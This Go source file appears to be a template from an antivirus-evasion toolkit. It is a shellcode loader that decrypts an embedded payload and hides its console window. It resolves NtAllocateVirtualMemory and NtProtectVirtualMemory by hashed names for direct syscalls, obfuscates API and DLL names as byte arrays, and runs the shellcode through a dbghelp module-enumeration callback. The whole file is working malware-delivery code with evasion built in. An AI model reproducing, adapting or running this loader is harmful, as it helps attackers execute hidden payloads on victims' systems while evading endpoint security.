package main

import (
	Go2gabh "Go2bypass/Doge-Gabh/Gabh"
	Go2public "Go2bypass/Public"
	"fmt"
	_ "embed"
	"os"
	"syscall"
	"unsafe"
)

//go:embed CodeToStringShell.txt
var CodeToStringShell string

var ApiDe Go2public.ApiEDcrypt
var CodeEnContent Go2public.CodToshellKey

func main() {
	/******HideConsole******/
	Go2public.Peels()
    CodeEnContent.KeyKey = `/******KeyKey******/`
    CodeEnContent.CodeToStringShell = CodeToStringShell
	/******DecodeType******/
	sc, err := ApiDe.CodeToShellDncrypt(CodeEnContent)
	if err != nil {
		os.Exit(0)
	}
		enumerateLoadedModules, _, _ := Go2gabh.DiskFuncPtr(string([]byte{'d', 'b', 'g', 'h', 'e', 'l', 'p', '.', 'd', 'l', 'l'}), "5e3838876713a569270ff10834c178c349a41518", Go2public.Str2sha1)
    	alloc, e := Go2gabh.GetSSNByNameExcept(Go2public.Str2sha1(string([]byte{'N', 't', 'A', 'l', 'l', 'o', 'c', 'a', 't', 'e', 'V', 'i', 'r', 't', 'u', 'a', 'l', 'M', 'e', 'm', 'o', 'r', 'y'})), Go2public.Str2sha1)
    	if e != nil {
    		panic(e)
    	}
    	protect, e := Go2gabh.GetSSNByNameExcept(Go2public.Sha256Hex(string([]byte{'N', 't', 'P', 'r', 'o', 't', 'e', 'c', 't', 'V', 'i', 'r', 't', 'u', 'a', 'l', 'M', 'e', 'm', 'o', 'r', 'y'})), Go2public.Sha256Hex)
    	if e != nil {
    		panic(e)
    	}
    	const (
    		mt = uintptr(0x00001000)
    		me = uintptr(0x00002000)
    	)

    	var handle = uintptr(0xffffffffffffffff)
    	var baseA uintptr
    	regionsize := uintptr(len(sc))
    	r1, r := Go2gabh.HgSyscall(
    		uint16(alloc),
    		handle,
    		uintptr(unsafe.Pointer(&baseA)),
    		0,
    		uintptr(unsafe.Pointer(&regionsize)),
    		uintptr(mt|me),
    		syscall.PAGE_READWRITE,
    	)
    	if r != nil {
    		return
    	}
    	Go2public.Cpymem(baseA, sc)

    	var oldprotect uintptr
    	r1, r = Go2gabh.HgSyscall(
    		uint16(protect),
    		handle,
    		uintptr(unsafe.Pointer(&baseA)),
    		uintptr(unsafe.Pointer(&regionsize)),
    		syscall.PAGE_EXECUTE_READ,
    		uintptr(unsafe.Pointer(&oldprotect)),
    	)
    	if r != nil {
    		fmt.Printf("1 %s %x\n", r, r1)
    		return
    	}
    	handle1, _ := syscall.GetCurrentProcess()
    	syscall.Syscall(uintptr(enumerateLoadedModules), 3, uintptr(handle1), baseA, 0)
}
